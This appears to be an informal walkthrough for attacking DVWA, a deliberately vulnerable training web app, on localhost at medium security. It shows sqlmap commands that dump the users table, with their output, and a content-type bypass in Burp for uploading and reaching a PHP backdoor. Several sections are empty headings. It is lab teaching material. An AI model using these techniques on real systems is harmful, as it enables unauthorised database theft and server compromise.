DVWA Level Medium

Before all execution, open your console and start apache2
#/etc/init.d/apache2 start
open burpsuite and mantra
type localhost/dvwa on address bar of mantra
login > username : admin || password : password
change dvwa security with medium level and submit.
ok,this is time to offensive :)

1. Brute Force
2. Comman execution
3. CSRF
4. File Inclusion
5. Sql Injection

type 1 on form and submit, go to burpsuite for get cookie
open console
#cd /pentest/database/sqlmap
#./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium; PHPSESSID=gratsfgdu78cop0t16vq7iu224" --dbs

available databases [6]:
[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10
[*] performance_schema
[*] test

get tables of dvwa database
#./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium; PHPSESSID=gratsfgdu78cop0t16vq7iu224" -D dvwa --tables

Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

get password of users tables
#./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium; PHPSESSID=gratsfgdu78cop0t16vq7iu224" -T users --dump

6. Blind Sql injection

the method/command is same w/Sql Injection, just different on URL.



7. Upload
browse your image to upload and upload
next look content type on burpsuite ( content-type : image/jpeg )
beside that, you can upload other file example php-backdoor.php with note you when you upload the file, you must change content-type on burpsuite so that file can upload,look step by step to upload other file

when upload, content-type still application/x-httpd-php

change with image/jpeg 

next step is forward look this

copy /hackable/uploads/php-backdoors.php on address after localhost/dvwa
#localhost/dvwa/hackable/uploads/php-backdoors.php
enter

8. XSS Stored
9. XSS